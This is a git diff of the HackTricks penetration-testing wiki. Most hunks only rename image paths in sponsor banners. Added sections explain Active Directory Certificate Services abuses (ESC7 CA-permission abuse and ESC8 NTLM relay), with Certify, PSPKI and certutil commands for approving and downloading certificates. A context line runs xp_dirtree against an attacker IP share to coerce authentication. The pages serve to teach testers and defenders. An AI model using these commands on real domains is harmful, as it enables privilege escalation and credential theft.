||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Email Injections
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -118,7 +118,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -285,7 +285,7 @@ In this case the attacker **won't receive the response timeout until he has sen
|
|||
|
||||
Amazon's Application Load Balancer (ALB) will **stream the data of the connection as needed**, but if it **receives** the **response** to the half request (the timeout) **before** receiving the **body**, it **won't send the body**, so a **Race Condition** must be exploited here:
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
There's an additional complication when it comes to **exploiting Apache behind ALB** - **both servers** have a default **timeout of 60 seconds**. This leaves an **extremely small time-window** to send the second part of the request. The RC attack was ultimately successful after 66 hours.
|
||||
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# NoSQL injection
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -121,7 +121,7 @@ Using the **$func** operator of the [MongoLite](https://github.com/agentejo/cock
|
|||
![](<../.gitbook/assets/image (468).png>)
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -272,7 +272,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Race Condition
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -125,7 +125,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Rate Limit Bypass
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -84,7 +84,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# XS-Search
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -84,7 +84,7 @@ You can access the tool in [https://xsinator.com/](https://xsinator.com/)
|
|||
{% endhint %}
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -196,7 +196,7 @@ You can perform the same attack with **`portal`** tags.
|
|||
Applications often use [postMessage broadcasts](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage) to share information with other origins. Listening to this messages one could find **sensitive info** (potentially if the the `targetOrigin` param is not used). Also, the fact of receiving some message can be **used as an oracle** (you only receive this kind of message if you are logged in).
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -278,7 +278,7 @@ Browsers use sockets to communicate with servers. As the operating system and th
|
|||
For more info: [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/)
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -817,7 +817,7 @@ In an execution timing it's possible to **eliminate** **network factors** to obt
|
|||
* **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks](https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#cross-window-timing-attacks)
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -935,7 +935,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -184,13 +184,13 @@ During certificate authentication, the DC can then verify that the authenticatin
|
|||
Schannel is the security support provider (SSP) Windows leverages when establishing TLS/SSL connections. Schannel supports **client authentication** (amongst many other capabilities), enabling a remote server to **verify the identity of the connecting user**. It accomplishes this using PKI, with certificates being the primary credential.\
|
||||
During the **TLS handshake**, the server **requests a certificate from the client** for authentication. The client, having previously been issued a client authentication certificate from a CA the server trusts, sends its certificate to the server. The **server then validates** the certificate is correct and grants the user access assuming everything is okay.
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (8).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (8) (2).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
When an account authenticates to AD using a certificate, the DC needs to somehow map the certificate credential to an AD account. **Schannel** first attempts to **map** the **credential** to a **user** account use Kerberos’s **S4U2Self** functionality. \
|
||||
If that is **unsuccessful**, it will follow the attempt to map the **certificate to a user** account using the certificate’s **SAN extension**, a combination of the **subject** and **issuer** fields, or solely from the issuer. By default, not many protocols in AD environments support AD authentication via Schannel out of the box. WinRM, RDP, and IIS all support client authentication using Schannel, but it **requires additional configuration**, and in some cases – like WinRM – does not integrate with Active Directory.\
|
||||
One protocol that does commonly work – assuming AD CS has been setup - is **LDAPS**. The cmdlet `Get-LdapCurrentUser` demonstrates how one can authenticate to LDAP using .NET libraries. The cmdlet performs an LDAP “Who am I?” extended operation to display the currently authenticating user:
|
||||
|
||||
<figure><img src="../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="../../.gitbook/assets/image (2) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
## AD CS Enumeration
|
||||
|
||||
|
|
|
@ -188,6 +188,100 @@ If you find this setting in your environment, you can **remove this flag** with:
|
|||
certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
|
||||
```
|
||||
|
||||
## Vulnerable Certificate Authority Access Control - ESC7
|
||||
|
||||
A certificate authority itself has a **set of permissions** that secure various **CA actions**. These permissions can be access from `certsrv.msc`, right clicking a CA, selecting properties, and switching to the Security tab:
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (8).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
This can also be enumerated via [**PSPKI’s module**](https://www.pkisolutions.com/tools/pspki/) with `Get-CertificationAuthority | Get-CertificationAuthorityAcl`:
|
||||
|
||||
```bash
|
||||
Get-CertificationAuthority -ComputerName dc.theshire.local | Get-certificationAuthorityAcl | select -expand Access
|
||||
```
|
||||
|
||||
The two main rights here are the **`ManageCA`** right and the **`ManageCertificates`** right, which translate to the “CA administrator” and “Certificate Manager”.
|
||||
|
||||
If you have a principal with **`ManageCA`** rights on a **certificate authority**, we can use **PSPKI** to remotely flip the **`EDITF_ATTRIBUTESUBJECTALTNAME2`** bit to **allow SAN** specification in any template ([ECS6](domain-escalation.md#editf\_attributesubjectaltname2-esc6)):
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (73).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
This is also possible in a simpler form with [**PSPKI’s Enable-PolicyModuleFlag**](https://www.sysadmins.lv/projects/pspki/enable-policymoduleflag.aspx) cmdlet.
|
||||
|
||||
The **`ManageCertificates`** rights permits to **approve a pending request**, therefore bypassing the "CA certificate manager approval" protection.
|
||||
|
||||
You can use a **combination** of **Certify** and **PSPKI** module to request a certificate, approve it, and download it:
|
||||
|
||||
```powershell
|
||||
# Request a certificate that will require an approval
|
||||
Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:ApprovalNeeded
|
||||
[...]
|
||||
[*] CA Response : The certificate is still pending.
|
||||
[*] Request ID : 336
|
||||
[...]
|
||||
|
||||
# Use PSPKI module to approve the request
|
||||
Import-Module PSPKI
|
||||
Get-CertificationAuthority -ComputerName dc.theshire.local | Get-PendingRequest -RequestID 336 | Approve-CertificateRequest
|
||||
|
||||
# Download the certificate
|
||||
Certify.exe download /ca:dc.theshire.local\theshire-DC-CA /id:336
|
||||
```
|
||||
|
||||
## NTLM Relay to AD CS HTTP Endpoints – ESC8
|
||||
|
||||
{% hint style="info" %}
|
||||
In summary, if an environment has **AD CS installed**, along with a **vulnerable web enrollment endpoint** and at least one **certificate template published** that allows for **domain computer enrollment and client authentication** (like the default **`Machine`** template), then an **attacker can compromise ANY computer with the spooler service running**!
|
||||
{% endhint %}
|
||||
|
||||
AD CS supports several **HTTP-based enrollment methods** via additional AD CS server roles that administrators can install. These HTTPbased certificate enrollment interfaces are all **vulnerable NTLM relay attacks**. Using NTLM relay, an attacker on a **compromised machine can impersonate any inbound-NTLM-authenticating AD account**. While impersonating the victim account, an attacker could access these web interfaces and **request a client authentication certificate based on the `User` or `Machine` certificate templates**.
|
||||
|
||||
* The **web enrollment interface** (an older looking ASP application accessible at `http://<caserver>/certsrv/`), by default only supports HTTP, which cannot protect against NTLM relay attacks. In addition, it explicitly only allows NTLM authentication via its Authorization HTTP header, so more secure protocols like Kerberos are unusable.
|
||||
* The **Certificate Enrollment Service** (CES), **Certificate Enrollment Policy** (CEP) Web Service, and **Network Device Enrollment Service** (NDES) support negotiate authentication by default via their Authorization HTTP header. Negotiate authentication **support** Kerberos and **NTLM**; consequently, an attacker can **negotiate down to NTLM** authentication during relay attacks. These web services do at least enable HTTPS by default, but unfortunately HTTPS by itself does **not protect against NTLM relay attacks**. Only when HTTPS is coupled with channel binding can HTTPS services be protected from NTLM relay attacks. Unfortunately, AD CS does not enable Extended Protection for Authentication on IIS, which is necessary to enable channel binding.
|
||||
|
||||
Common **problems** with NTLM relay attacks are that the **NTLM sessions are usually short** and that the attacker **cannot** interact with services that **enforce NTLM signing**.
|
||||
|
||||
However, abusing a NTLM relay attack to obtain a certificate to the user solves this limitations, as the session will live as long as the certificate is valid and the certificate can be used to use services **enforcing NTLM signing**. To know how to use an stolen cert check:
|
||||
|
||||
{% content-ref url="account-persistence.md" %}
|
||||
[account-persistence.md](account-persistence.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
Another limitation of NTLM relay attacks is that they **require a victim account to authenticate to an attacker-controlled machine**. An attacker could wait or could try to **force** it:
|
||||
|
||||
{% content-ref url="../printers-spooler-service-abuse.md" %}
|
||||
[printers-spooler-service-abuse.md](../printers-spooler-service-abuse.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
****[**Certify**](https://github.com/GhostPack/Certify)’s `cas` command can enumerate **enabled HTTP AD CS endpoints**:
|
||||
|
||||
```
|
||||
Certify.exe cas
|
||||
```
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (78).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Enterprise CAs also **store CES endpoints** in their AD object in the `msPKI-Enrollment-Servers` property. **Certutil.exe** and **PSPKI** can parse and list these endpoints:
|
||||
|
||||
```
|
||||
certutil.exe -enrollmentServerURL -config CORPDC01.CORP.LOCAL\CORP-CORPDC01-CA
|
||||
```
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
```powershell
|
||||
Import-Module PSPKI
|
||||
Get-CertificationAuthority | select Name,Enroll* | Format-List *
|
||||
```
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (81).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
## References
|
||||
|
||||
* All the information for this page was taken from [https://www.specterops.io/assets/resources/Certified\_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified\_Pre-Owned.pdf)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
|
|
@ -0,0 +1,39 @@
|
|||
# Domain Persistence
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
|
@ -1,7 +1,7 @@
|
|||
# DCSync
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -45,7 +45,7 @@ Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveG
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -106,7 +106,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -87,13 +87,13 @@ In the previous flow it was used the trust hash instead of the **clear text pass
|
|||
|
||||
The cleartext password can be obtained by converting the \[ CLEAR ] output from mimikatz from hexadecimal and removing null bytes ‘\x00’:
|
||||
|
||||
![](<../../.gitbook/assets/image (2) (1).png>)
|
||||
![](<../../.gitbook/assets/image (2) (1) (2).png>)
|
||||
|
||||
Sometimes when creating a trust relationship, a password must be typed in by the user for the trust. In this demonstration, the key is the original trust password and therefore human readable. As the key cycles (30 days), the cleartext will not be human-readable but technically still usable.
|
||||
|
||||
The cleartext password can be used to perform regular authentication as the trust account, an alternative to requesting a TGT using the Kerberos secret key of the trust account. Here, querying root.local from ext.local for members of Domain Admins:
|
||||
|
||||
![](<../../.gitbook/assets/image (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (1) (1) (2).png>)
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Kerberoast
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -77,7 +77,7 @@ When a TGS is requested, Windows event `4769 - A Kerberos service ticket was req
|
|||
{% endhint %}
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -144,7 +144,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -87,6 +87,8 @@ C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -S
|
|||
EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1
|
||||
```
|
||||
|
||||
Or use this other technique: [https://github.com/p0dalirius/MSSQL-Analysis-Coerce](https://github.com/p0dalirius/MSSQL-Analysis-Coerce)
|
||||
|
||||
## HTML injection
|
||||
|
||||
### Via email
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# ACLs - DACLs/SACLs/ACEs
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -83,7 +83,7 @@ The canonical order ensures that the following takes place:
|
|||
* All **explicit ACEs are processed before any inherited ACE**. This is consistent with the concept of discretionary access control: access to a child object (for example a file) is at the discretion of the child's owner, not the owner of the parent object (for example a folder). The owner of a child object can define permissions directly on the child. The result is that the effects of inherited permissions are modified.
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -209,7 +209,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|